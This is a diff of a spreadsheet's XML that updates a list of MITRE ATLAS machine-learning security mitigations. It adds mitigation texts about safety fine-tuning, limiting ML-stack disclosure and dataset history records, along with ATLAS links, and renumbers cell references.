+    <t>When training or fine-tuning a generative AI model it is important to utilize techniques that improve model alignment with safety, security, and content policies.
+The fine-tuning process can potentially remove built-in safety mechanisms in a generative AI model, but utilizing techniques such as Supervised Fine-Tuning, Reinforcement Learning from Human Feedback or AI Feedback, and Targeted Safety Context Distillation can improve the safety and alignment of the model.</t>
+  </si>
+  <si>
     <t xml:space="preserve">Preprocess all inference data to nullify or reverse potential adversarial perturbations.
 </t>
   </si>
@@ -2058,8 +2302,10 @@
 </t>
   </si>
   <si>
-    <t xml:space="preserve">Limit the public release of technical information about the machine learning stack used in an organization's products or services. Technical knowledge of how machine learning is used can be leveraged by adversaries to perform targeting and tailor attacks to the target system. Additionally, consider limiting the release of organizational information - including physical locations, researcher names, and department structures - from which technical details such as machine learning techniques, model architectures, or datasets may be inferred.
-</t>
+    <t>Limit the public release of technical information about the machine learning stack used in an organization's products or services. Technical knowledge of how machine learning is used can be leveraged by adversaries to perform targeting and tailor attacks to the target system. Additionally, consider limiting the release of organizational information - including physical locations, researcher names, and department structures - from which technical details such as machine learning techniques, model architectures, or datasets may be inferred.</t>
+  </si>
+  <si>
+    <t>Maintain a detailed history of datasets used for AI applications. The history should include information about the dataset's source as well as a complete record of any modifications.</t>
   </si>
   <si>
     <t xml:space="preserve">Deploying ML models to edge devices can increase the attack surface of the system.
@@ -2117,6 +2363,12 @@
 </t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/mitigations/AML.M0023</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/mitigations/AML.M0024</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/mitigations/AML.M0015</t>
   </si>
   <si>
@@ -2132,6 +2384,15 @@
     <t>https://atlas.mitre.org/mitigations/AML.M0012</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/mitigations/AML.M0020</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/mitigations/AML.M0021</t>
+  </si>
+  <si>
+    <t>https://atlas.mitre.org/mitigations/AML.M0022</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/mitigations/AML.M0010</t>
   </si>
   <si>
@@ -2141,6 +2402,9 @@
     <t>https://atlas.mitre.org/mitigations/AML.M0000</t>
   </si>
   <si>
+    <t>https://atlas.mitre.org/mitigations/AML.M0025</t>
+  </si>
+  <si>
     <t>https://atlas.mitre.org/mitigations/AML.M0017</t>
   </si>
   <si>
@@ -2175,6 +2439,9 @@
   </si>
   <si>
     <t>https://atlas.mitre.org/mitigations/AML.M0016</t>
+  </si>
+  <si>
+    <t>12 April 2023</t>
   </si>
 </sst>
 </file>
@@ -2583,7 +2850,7 @@
 
 <file path=xl/worksheets/sheet1.xml><?xml version="1.0" encoding="utf-8"?>
 <worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
-  <dimension ref="A1:I83"/>
+  <dimension ref="A1:I92"/>
   <sheetViews>
     <sheetView tabSelected="1" workbookViewId="0"/>
   </sheetViews>
@@ -2623,28 +2890,28 @@
         <v>9</v>
       </c>
       <c r="B2" t="s">
-        <v>91</v>
+        <v>100</v>
       </c>
       <c r="C2" t="s">
-        <v>173</v>
+        <v>191</v>
       </c>
       <c r="D2" t="s">
-        <v>255</v>
+        <v>282</v>
       </c>
       <c r="E2" s="2" t="s">
-        <v>337</v>
+        <v>373</v>
       </c>
       <c r="F2" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="G2" t="s">
-        <v>419</v>
+        <v>468</v>
       </c>
       <c r="H2" t="s">
-        <v>420</v>
+        <v>475</v>
       </c>
       <c r="I2" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="3" spans="1:9">
@@ -2652,28 +2919,28 @@
         <v>10</v>
       </c>
       <c r="B3" t="s">
-        <v>92</v>
+        <v>101</v>
       </c>
       <c r="C3" t="s">
-        <v>174</v>
+        <v>192</v>
       </c>
       <c r="D3" t="s">
-        <v>256</v>
+        <v>283</v>
       </c>
       <c r="E3" s="2" t="s">
-        <v>338</v>
+        <v>374</v>
       </c>
       <c r="F3" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="G3" t="s">
-        <v>419</v>
+        <v>468</v>
       </c>
       <c r="H3" t="s">
-        <v>420</v>
+        <v>476</v>
       </c>
       <c r="I3" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="4" spans="1:9">
@@ -2681,28 +2948,28 @@
         <v>11</v>
       </c>
       <c r="B4" t="s">
-        <v>93</v>
+        <v>102</v>
       </c>
       <c r="C4" t="s">
-        <v>175</v>
+        <v>193</v>
       </c>
       <c r="D4" t="s">
-        <v>257</v>
+        <v>284</v>
       </c>
       <c r="E4" s="2" t="s">
-        <v>339</v>
+        <v>375</v>
       </c>
       <c r="F4" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="G4" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="H4" t="s">
-        <v>421</v>
+        <v>476</v>
       </c>
       <c r="I4" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="5" spans="1:9">
@@ -2710,28 +2977,28 @@
         <v>12</v>
       </c>
       <c r="B5" t="s">
-        <v>94</v>
+        <v>103</v>
       </c>
       <c r="C5" t="s">
-        <v>176</v>
+        <v>194</v>
       </c>
       <c r="D5" t="s">
-        <v>258</v>
+        <v>285</v>
       </c>
       <c r="E5" s="2" t="s">
-        <v>340</v>
+        <v>376</v>
       </c>
       <c r="F5" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="G5" t="s">
-        <v>419</v>
+        <v>470</v>
       </c>
       <c r="H5" t="s">
-        <v>420</v>
+        <v>477</v>
       </c>
       <c r="I5" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="6" spans="1:9">
@@ -2739,28 +3006,28 @@
         <v>13</v>
       </c>
       <c r="B6" t="s">
-        <v>95</v>
+        <v>104</v>
       </c>
       <c r="C6" t="s">
-        <v>177</v>
+        <v>195</v>
       </c>
       <c r="D6" t="s">
-        <v>259</v>
+        <v>286</v>
       </c>
       <c r="E6" s="2" t="s">
-        <v>341</v>
+        <v>377</v>
       </c>
       <c r="F6" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="G6" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="H6" t="s">
-        <v>420</v>
+        <v>476</v>
       </c>
       <c r="I6" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="7" spans="1:9">
@@ -2768,28 +3035,28 @@
         <v>14</v>
       </c>
       <c r="B7" t="s">
-        <v>96</v>
+        <v>105</v>
       </c>
       <c r="C7" t="s">
-        <v>178</v>
+        <v>196</v>
       </c>
       <c r="D7" t="s">
-        <v>260</v>
+        <v>287</v>
       </c>
       <c r="E7" s="2" t="s">
-        <v>342</v>
+        <v>378</v>
       </c>
       <c r="F7" t="s">
-        <v>419</v>
+        <v>465</v>
       </c>
       <c r="G7" t="s">
-        <v>419</v>
+        <v>465</v>
       </c>
       <c r="H7" t="s">
-        <v>422</v>
+        <v>476</v>
       </c>
       <c r="I7" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="8" spans="1:9">
@@ -2797,28 +3064,28 @@
         <v>15</v>
       </c>
       <c r="B8" t="s">
-        <v>97</v>
+        <v>106</v>
       </c>
       <c r="C8" t="s">
-        <v>179</v>
+        <v>197</v>
       </c>
       <c r="D8" t="s">
-        <v>261</v>
+        <v>288</v>
       </c>
       <c r="E8" s="2" t="s">
-        <v>343</v>
+        <v>379</v>
       </c>
       <c r="F8" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="G8" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="H8" t="s">
-        <v>423</v>
+        <v>478</v>
       </c>
       <c r="I8" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="9" spans="1:9">
@@ -2826,28 +3093,28 @@
         <v>16</v>
       </c>
       <c r="B9" t="s">
-        <v>98</v>
+        <v>107</v>
       </c>
       <c r="C9" t="s">
-        <v>180</v>
+        <v>198</v>
       </c>
       <c r="D9" t="s">
-        <v>262</v>
+        <v>289</v>
       </c>
       <c r="E9" s="2" t="s">
-        <v>344</v>
+        <v>380</v>
       </c>
       <c r="F9" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="G9" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="H9" t="s">
-        <v>423</v>
+        <v>479</v>
       </c>
       <c r="I9" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="10" spans="1:9">
@@ -2855,28 +3122,28 @@
         <v>17</v>
       </c>
       <c r="B10" t="s">
-        <v>99</v>
+        <v>108</v>
       </c>
       <c r="C10" t="s">
-        <v>181</v>
+        <v>199</v>
       </c>
       <c r="D10" t="s">
-        <v>263</v>
+        <v>290</v>
       </c>
       <c r="E10" s="2" t="s">
-        <v>345</v>
+        <v>381</v>
       </c>
       <c r="F10" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="G10" t="s">
-        <v>419</v>
+        <v>471</v>
       </c>
       <c r="H10" t="s">
-        <v>424</v>
+        <v>479</v>
       </c>
       <c r="I10" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="11" spans="1:9">
@@ -2884,28 +3151,28 @@
         <v>18</v>
       </c>
       <c r="B11" t="s">
-        <v>100</v>
+        <v>109</v>
       </c>
       <c r="C11" t="s">
-        <v>182</v>
+        <v>200</v>
       </c>
       <c r="D11" t="s">
-        <v>264</v>
+        <v>291</v>
       </c>
       <c r="E11" s="2" t="s">
-        <v>346</v>
+        <v>382</v>
       </c>
       <c r="F11" t="s">
-        <v>419</v>
+        <v>466</v>
       </c>
       <c r="G11" t="s">
-        <v>419</v>
+        <v>472</v>
       </c>
       <c r="H11" t="s">
-        <v>420</v>
+        <v>480</v>
       </c>
       <c r="I11" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="12" spans="1:9">
@@ -2913,28 +3180,28 @@
         <v>19</v>
       </c>
       <c r="B12" t="s">
-        <v>101</v>
+        <v>110</v>
       </c>
       <c r="C12" t="s">
-        <v>183</v>
+        <v>201</v>
       </c>
       <c r="D12" t="s">
-        <v>265</v>
+        <v>292</v>
       </c>
       <c r="E12" s="2" t="s">
-        <v>347</v>
+        <v>383</v>
       </c>
       <c r="F12" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="G12" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="H12" t="s">
-        <v>425</v>
+        <v>476</v>
       </c>
       <c r="I12" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="13" spans="1:9">
@@ -2942,28 +3209,28 @@
         <v>20</v>
       </c>
       <c r="B13" t="s">
-        <v>102</v>
+        <v>111</v>
       </c>
       <c r="C13" t="s">
-        <v>184</v>
+        <v>202</v>
       </c>
       <c r="D13" t="s">
-        <v>266</v>
+        <v>293</v>
       </c>
       <c r="E13" s="2" t="s">
-        <v>348</v>
+        <v>384</v>
       </c>
       <c r="F13" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="G13" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="H13" t="s">
-        <v>423</v>
+        <v>481</v>
       </c>
       <c r="I13" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="14" spans="1:9">
@@ -2971,28 +3238,28 @@
         <v>21</v>
       </c>
       <c r="B14" t="s">
-        <v>103</v>
+        <v>112</v>
       </c>
       <c r="C14" t="s">
-        <v>185</v>
+        <v>203</v>
       </c>
       <c r="D14" t="s">
-        <v>267</v>
+        <v>294</v>
       </c>
       <c r="E14" s="2" t="s">
-        <v>349</v>
+        <v>385</v>
       </c>
       <c r="F14" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="G14" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="H14" t="s">
-        <v>423</v>
+        <v>479</v>
       </c>
       <c r="I14" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="15" spans="1:9">
@@ -3000,28 +3267,28 @@
         <v>22</v>
       </c>
       <c r="B15" t="s">
-        <v>104</v>
+        <v>113</v>
       </c>
       <c r="C15" t="s">
-        <v>186</v>
+        <v>204</v>
       </c>
       <c r="D15" t="s">
-        <v>268</v>
+        <v>295</v>
       </c>
       <c r="E15" s="2" t="s">
-        <v>350</v>
+        <v>386</v>
       </c>
       <c r="F15" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="G15" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="H15" t="s">
-        <v>426</v>
+        <v>479</v>
       </c>
       <c r="I15" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="16" spans="1:9">
@@ -3029,28 +3296,28 @@
         <v>23</v>
       </c>
       <c r="B16" t="s">
-        <v>105</v>
+        <v>114</v>
       </c>
       <c r="C16" t="s">
-        <v>187</v>
+        <v>205</v>
       </c>
       <c r="D16" t="s">
-        <v>269</v>
+        <v>296</v>
       </c>
       <c r="E16" s="2" t="s">
-        <v>351</v>
+        <v>387</v>
       </c>
       <c r="F16" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="G16" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="H16" t="s">
-        <v>427</v>
+        <v>482</v>
       </c>
       <c r="I16" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="17" spans="1:9">
@@ -3058,28 +3325,28 @@
         <v>24</v>
       </c>
       <c r="B17" t="s">
-        <v>106</v>
+        <v>115</v>
       </c>
       <c r="C17" t="s">
-        <v>188</v>
+        <v>206</v>
       </c>
       <c r="D17" t="s">
-        <v>270</v>
+        <v>297</v>
       </c>
       <c r="E17" s="2" t="s">
-        <v>352</v>
+        <v>388</v>
       </c>
       <c r="F17" t="s">
-        <v>419</v>
+        <v>467</v>
       </c>
       <c r="G17" t="s">
-        <v>419</v>
+        <v>470</v>
       </c>
       <c r="H17" t="s">
-        <v>427</v>
+        <v>483</v>
       </c>
       <c r="I17" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="18" spans="1:9">
@@ -3087,28 +3354,28 @@
         <v>25</v>
       </c>
       <c r="B18" t="s">
-        <v>107</v>
+        <v>116</v>
       </c>
       <c r="C18" t="s">
-        <v>189</v>
+        <v>207</v>
       </c>
       <c r="D18" t="s">
-        <v>271</v>
+        <v>298</v>
       </c>
       <c r="E18" s="2" t="s">
-        <v>353</v>
+        <v>389</v>
       </c>
       <c r="F18" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="G18" t="s">
-        <v>419</v>
+        <v>470</v>
       </c>
       <c r="H18" t="s">
-        <v>420</v>
+        <v>483</v>
       </c>
       <c r="I18" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="19" spans="1:9">
@@ -3116,28 +3383,28 @@
         <v>26</v>
       </c>
       <c r="B19" t="s">
-        <v>108</v>
+        <v>117</v>
       </c>
       <c r="C19" t="s">
-        <v>190</v>
+        <v>208</v>
       </c>
       <c r="D19" t="s">
-        <v>272</v>
+        <v>299</v>
       </c>
       <c r="E19" s="2" t="s">
-        <v>354</v>
+        <v>390</v>
       </c>
       <c r="F19" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="G19" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="H19" t="s">
-        <v>425</v>
+        <v>476</v>
       </c>
       <c r="I19" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="20" spans="1:9">
@@ -3145,28 +3412,28 @@
         <v>27</v>
       </c>
       <c r="B20" t="s">
-        <v>109</v>
+        <v>118</v>
       </c>
       <c r="C20" t="s">
-        <v>191</v>
+        <v>209</v>
       </c>
       <c r="D20" t="s">
-        <v>273</v>
+        <v>300</v>
       </c>
       <c r="E20" s="2" t="s">
-        <v>355</v>
+        <v>391</v>
       </c>
       <c r="F20" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="G20" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="H20" t="s">
-        <v>420</v>
+        <v>481</v>
       </c>
       <c r="I20" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="21" spans="1:9">
@@ -3174,28 +3441,28 @@
         <v>28</v>
       </c>
       <c r="B21" t="s">
-        <v>110</v>
+        <v>119</v>
       </c>
       <c r="C21" t="s">
-        <v>192</v>
+        <v>210</v>
       </c>
       <c r="D21" t="s">
-        <v>274</v>
+        <v>301</v>
       </c>
       <c r="E21" s="2" t="s">
-        <v>356</v>
+        <v>392</v>
       </c>
       <c r="F21" t="s">
-        <v>419</v>
+        <v>465</v>
       </c>
       <c r="G21" t="s">
-        <v>419</v>
+        <v>465</v>
       </c>
       <c r="H21" t="s">
-        <v>428</v>
+        <v>476</v>
       </c>
       <c r="I21" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="22" spans="1:9">
@@ -3203,28 +3470,28 @@
         <v>29</v>
       </c>
       <c r="B22" t="s">
-        <v>111</v>
+        <v>120</v>
       </c>
       <c r="C22" t="s">
-        <v>193</v>
+        <v>211</v>
       </c>
       <c r="D22" t="s">
-        <v>275</v>
+        <v>302</v>
       </c>
       <c r="E22" s="2" t="s">
-        <v>357</v>
+        <v>393</v>
       </c>
       <c r="F22" t="s">
-        <v>419</v>
+        <v>465</v>
       </c>
       <c r="G22" t="s">
-        <v>419</v>
+        <v>465</v>
       </c>
       <c r="H22" t="s">
-        <v>429</v>
+        <v>484</v>
       </c>
       <c r="I22" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="23" spans="1:9">
@@ -3232,28 +3499,28 @@
         <v>30</v>
       </c>
       <c r="B23" t="s">
-        <v>112</v>
+        <v>121</v>
       </c>
       <c r="C23" t="s">
-        <v>194</v>
+        <v>212</v>
       </c>
       <c r="D23" t="s">
-        <v>276</v>
+        <v>303</v>
       </c>
       <c r="E23" s="2" t="s">
-        <v>358</v>
+        <v>394</v>
       </c>
       <c r="F23" t="s">
-        <v>419</v>
+        <v>468</v>
       </c>
       <c r="G23" t="s">
-        <v>419</v>
+        <v>468</v>
       </c>
       <c r="H23" t="s">
-        <v>429</v>
+        <v>485</v>
       </c>
       <c r="I23" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="24" spans="1:9">
@@ -3261,28 +3528,28 @@
         <v>31</v>
       </c>
       <c r="B24" t="s">
-        <v>113</v>
+        <v>122</v>
       </c>
       <c r="C24" t="s">
-        <v>195</v>
+        <v>213</v>
       </c>
       <c r="D24" t="s">
-        <v>277</v>
+        <v>304</v>
       </c>
       <c r="E24" s="2" t="s">
-        <v>359</v>
+        <v>395</v>
       </c>
       <c r="F24" t="s">
-        <v>419</v>
+        <v>468</v>
       </c>
       <c r="G24" t="s">
-        <v>419</v>
+        <v>468</v>
       </c>
       <c r="H24" t="s">
-        <v>429</v>
+        <v>485</v>
       </c>
       <c r="I24" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="25" spans="1:9">
@@ -3290,28 +3557,28 @@
         <v>32</v>
       </c>
       <c r="B25" t="s">
-        <v>114</v>
+        <v>123</v>
       </c>
       <c r="C25" t="s">
-        <v>196</v>
+        <v>214</v>
       </c>
       <c r="D25" t="s">
-        <v>278</v>
+        <v>305</v>
       </c>
       <c r="E25" s="2" t="s">
-        <v>360</v>
+        <v>396</v>
       </c>
       <c r="F25" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="G25" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="H25" t="s">
-        <v>425</v>
+        <v>485</v>
       </c>
       <c r="I25" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="26" spans="1:9">
@@ -3319,28 +3586,28 @@
         <v>33</v>
       </c>
       <c r="B26" t="s">
-        <v>115</v>
+        <v>124</v>
       </c>
       <c r="C26" t="s">
-        <v>197</v>
+        <v>215</v>
       </c>
       <c r="D26" t="s">
-        <v>279</v>
+        <v>306</v>
       </c>
       <c r="E26" s="2" t="s">
-        <v>361</v>
+        <v>397</v>
       </c>
       <c r="F26" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="G26" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="H26" t="s">
-        <v>420</v>
+        <v>485</v>
       </c>
       <c r="I26" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="27" spans="1:9">
@@ -3348,28 +3615,28 @@
         <v>34</v>
       </c>
       <c r="B27" t="s">
-        <v>116</v>
+        <v>125</v>
       </c>
       <c r="C27" t="s">
-        <v>198</v>
+        <v>216</v>
       </c>
       <c r="D27" t="s">
-        <v>280</v>
+        <v>307</v>
       </c>
       <c r="E27" s="2" t="s">
-        <v>362</v>
+        <v>398</v>
       </c>
       <c r="F27" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="G27" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="H27" t="s">
-        <v>430</v>
+        <v>485</v>
       </c>
       <c r="I27" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="28" spans="1:9">
@@ -3377,28 +3644,28 @@
         <v>35</v>
       </c>
       <c r="B28" t="s">
-        <v>117</v>
+        <v>126</v>
       </c>
       <c r="C28" t="s">
-        <v>199</v>
+        <v>217</v>
       </c>
       <c r="D28" t="s">
-        <v>281</v>
+        <v>308</v>
       </c>
       <c r="E28" s="2" t="s">
-        <v>363</v>
+        <v>399</v>
       </c>
       <c r="F28" t="s">
-        <v>419</v>
+        <v>468</v>
       </c>
       <c r="G28" t="s">
-        <v>419</v>
+        <v>468</v>
       </c>
       <c r="H28" t="s">
-        <v>431</v>
+        <v>485</v>
       </c>
       <c r="I28" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="29" spans="1:9">
@@ -3406,28 +3673,28 @@
         <v>36</v>
       </c>
       <c r="B29" t="s">
-        <v>118</v>
+        <v>127</v>
       </c>
       <c r="C29" t="s">
-        <v>200</v>
+        <v>218</v>
       </c>
       <c r="D29" t="s">
-        <v>282</v>
+        <v>309</v>
       </c>
       <c r="E29" s="2" t="s">
-        <v>364</v>
+        <v>400</v>
       </c>
       <c r="F29" t="s">
-        <v>419</v>
+        <v>468</v>
       </c>
       <c r="G29" t="s">
-        <v>419</v>
+        <v>468</v>
       </c>
       <c r="H29" t="s">
-        <v>431</v>
+        <v>481</v>
       </c>
       <c r="I29" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="30" spans="1:9">
@@ -3435,28 +3702,28 @@
         <v>37</v>
       </c>
       <c r="B30" t="s">
-        <v>119</v>
+        <v>128</v>
       </c>
       <c r="C30" t="s">
-        <v>201</v>
+        <v>219</v>
       </c>
       <c r="D30" t="s">
-        <v>283</v>
+        <v>310</v>
       </c>
       <c r="E30" s="2" t="s">
-        <v>365</v>
+        <v>401</v>
       </c>
       <c r="F30" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="G30" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="H30" t="s">
-        <v>426</v>
+        <v>481</v>
       </c>
       <c r="I30" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="31" spans="1:9">
@@ -3464,28 +3731,28 @@
         <v>38</v>
       </c>
       <c r="B31" t="s">
-        <v>120</v>
+        <v>129</v>
       </c>
       <c r="C31" t="s">
-        <v>202</v>
+        <v>220</v>
       </c>
       <c r="D31" t="s">
-        <v>284</v>
+        <v>311</v>
       </c>
       <c r="E31" s="2" t="s">
-        <v>366</v>
+        <v>402</v>
       </c>
       <c r="F31" t="s">
-        <v>419</v>
+        <v>467</v>
       </c>
       <c r="G31" t="s">
-        <v>419</v>
+        <v>470</v>
       </c>
       <c r="H31" t="s">
-        <v>425</v>
+        <v>476</v>
       </c>
       <c r="I31" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="32" spans="1:9">
@@ -3493,28 +3760,28 @@
         <v>39</v>
       </c>
       <c r="B32" t="s">
-        <v>121</v>
+        <v>130</v>
       </c>
       <c r="C32" t="s">
-        <v>203</v>
+        <v>221</v>
       </c>
       <c r="D32" t="s">
-        <v>285</v>
+        <v>312</v>
       </c>
       <c r="E32" s="2" t="s">
-        <v>367</v>
+        <v>403</v>
       </c>
       <c r="F32" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="G32" t="s">
-        <v>419</v>
+        <v>469</v>
       </c>
       <c r="H32" t="s">
-        <v>431</v>
+        <v>486</v>
       </c>
       <c r="I32" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="33" spans="1:9">
@@ -3522,28 +3789,28 @@
         <v>40</v>
       </c>
       <c r="B33" t="s">
-        <v>122</v>
+        <v>131</v>
       </c>
       <c r="C33" t="s">
-        <v>204</v>
+        <v>222</v>
       </c>
       <c r="D33" t="s">
-        <v>286</v>
+        <v>313</v>
       </c>
       <c r="E33" s="2" t="s">
-        <v>368</v>
+        <v>404</v>
       </c>
       <c r="F33" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="G33" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="H33" t="s">
-        <v>425</v>
+        <v>487</v>
       </c>
       <c r="I33" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="34" spans="1:9">
@@ -3551,28 +3818,28 @@
         <v>41</v>
       </c>
       <c r="B34" t="s">
-        <v>123</v>
+        <v>132</v>
       </c>
       <c r="C34" t="s">
-        <v>205</v>
+        <v>223</v>
       </c>
       <c r="D34" t="s">
-        <v>287</v>
+        <v>314</v>
       </c>
       <c r="E34" s="2" t="s">
-        <v>369</v>
+        <v>405</v>
       </c>
       <c r="F34" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="G34" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="H34" t="s">
-        <v>432</v>
+        <v>487</v>
       </c>
       <c r="I34" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="35" spans="1:9">
@@ -3580,28 +3847,28 @@
         <v>42</v>
       </c>
       <c r="B35" t="s">
-        <v>124</v>
+        <v>133</v>
       </c>
       <c r="C35" t="s">
-        <v>206</v>
+        <v>224</v>
       </c>
       <c r="D35" t="s">
-        <v>288</v>
+        <v>315</v>
       </c>
       <c r="E35" s="2" t="s">
-        <v>370</v>
+        <v>406</v>
       </c>
       <c r="F35" t="s">
-        <v>419</v>
+        <v>466</v>
       </c>
       <c r="G35" t="s">
-        <v>419</v>
+        <v>466</v>
       </c>
       <c r="H35" t="s">
-        <v>426</v>
+        <v>482</v>
       </c>
       <c r="I35" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="36" spans="1:9">
@@ -3609,28 +3876,28 @@
         <v>43</v>
       </c>
       <c r="B36" t="s">
-        <v>125</v>
+        <v>134</v>
       </c>
       <c r="C36" t="s">
-        <v>207</v>
+        <v>225</v>
       </c>
       <c r="D36" t="s">
-        <v>289</v>
+        <v>316</v>
       </c>
       <c r="E36" s="2" t="s">
-        <v>371</v>
+        <v>407</v>
       </c>
       <c r="F36" t="s">
-        <v>419</v>
+        <v>469</v>
       </c>
       <c r="G36" t="s">
-        <v>419</v>
+        <v>465</v>
       </c>
       <c r="H36" t="s">
-        <v>428</v>
+        <v>481</v>
       </c>
       <c r="I36" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="37" spans="1:9">
@@ -3638,28 +3905,28 @@
         <v>44</v>
       </c>
       <c r="B37" t="s">
-        <v>126</v>
+        <v>135</v>
       </c>
       <c r="C37" t="s">
-        <v>208</v>
+        <v>226</v>
       </c>
       <c r="D37" t="s">
-        <v>290</v>
+        <v>317</v>
       </c>
       <c r="E37" s="2" t="s">
-        <v>372</v>
+        <v>408</v>
       </c>
       <c r="F37" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="G37" t="s">
-        <v>419</v>
+        <v>464</v>
       </c>
       <c r="H37" t="s">
-        <v>431</v>
+        <v>487</v>
       </c>
       <c r="I37" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="38" spans="1:9">
@@ -3667,28 +3934,28 @@
         <v>45</v>
       </c>
       <c r="B38" t="s">
-        <v>127</v>
+        <v>136</v>
       </c>
       <c r="C38" t="s">
-        <v>209</v>
+        <v>227</v>
       </c>
       <c r="D38" t="s">
-        <v>291</v>
+        <v>318</v>
       </c>
       <c r="E38" s="2" t="s">
-        <v>373</v>
+        <v>409</v>
       </c>
       <c r="F38" t="s">
-        <v>419</v>
+        <v>465</v>
       </c>
       <c r="G38" t="s">
-        <v>419</v>
+        <v>465</v>
       </c>
       <c r="H38" t="s">
-        <v>422</v>
+        <v>481</v>
       </c>
       <c r="I38" t="s">
-        <v>438</v>
+        <v>494</v>
       </c>
     </row>
     <row r="39" spans="1:9">
@@ -3696,28 +3963,28 @@
         <v>46</v>
       </c>
       <c r="B39" t="s">
-        <v>128</v>
+        <v>137</v>
       </c>
       <c r="C39" t="s">
-        <v>210</v>
+        <v>228</v>
       </c>
       <c r="D39" t="s">
-        <v>292</v>
+        <v>319</v>
       </c>
